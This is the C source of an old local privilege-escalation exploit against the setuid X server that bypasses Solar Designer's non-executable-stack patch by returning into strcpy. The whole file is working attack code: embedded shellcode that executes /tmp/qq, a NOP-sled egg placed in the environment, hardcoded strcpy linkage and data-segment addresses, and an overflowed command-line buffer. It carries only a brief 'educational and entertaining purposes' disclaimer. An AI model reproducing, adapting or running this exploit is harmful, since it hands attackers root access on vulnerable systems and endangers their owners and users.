/*
** Exploit no 1 for Solar Designer patch
**  by nergal@icm.edu.pl
**  This code is meant for educational and entertaining purposes only.
**  You can distribute it freely provided credits are given.
**
*/

#include <stdio.h>

/* change the following 0 if the code doesn't work */
#define OFFSET                          0
#define BUFFER_SIZE                     370
#define EGG_SIZE                        2048
#define NOP                             0x90

/* any address in data segment */
#define DEST                            0x08223038
/* strcpy linkage table entry */
#define STRCPY                          0x08066a18

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/tmp/qq";

char buf[BUFFER_SIZE];
char egg[EGG_SIZE];
char pattern[16];

void main(int argc, char **argv)
{
  /* try alignment in 3..18; three worked for me */
  int i, align = 3;
  int src = (int) &src - OFFSET;  /* formerly known as get_sp() :) */

  if (argc == 2)
    align = atoi(argv[1]);

  *(int *) pattern = STRCPY;
  *(int *) (pattern + 4) = DEST;
  *(int *) (pattern + 8) = DEST;
  *(int *) (pattern + 12) = src;
  for (i = 0; i <= 15; i++)
    if (pattern[i] == 0)
      {
        printf("zero in pattern (%i)\n", i);
        exit(1);
      }

  memset(buf, ' ', BUFFER_SIZE);
  buf[BUFFER_SIZE - 1] = 0;
  buf[0] = ':';
  buf[1] = '9';
  for (i = align; i < BUFFER_SIZE - 16; i += 16)
    memcpy(buf + i, pattern, 16);

  memset(egg, NOP, EGG_SIZE);
  strcpy(egg + EGG_SIZE - strlen(shellcode) - 2, shellcode);
  strncpy(egg, "EGG=", 4);
  putenv(egg);

  execl("/usr/X11R6/bin/X", "X", buf, "-nolock", 0);
  perror("execl");
}
/*                    www.hack.co.za              [2000]*/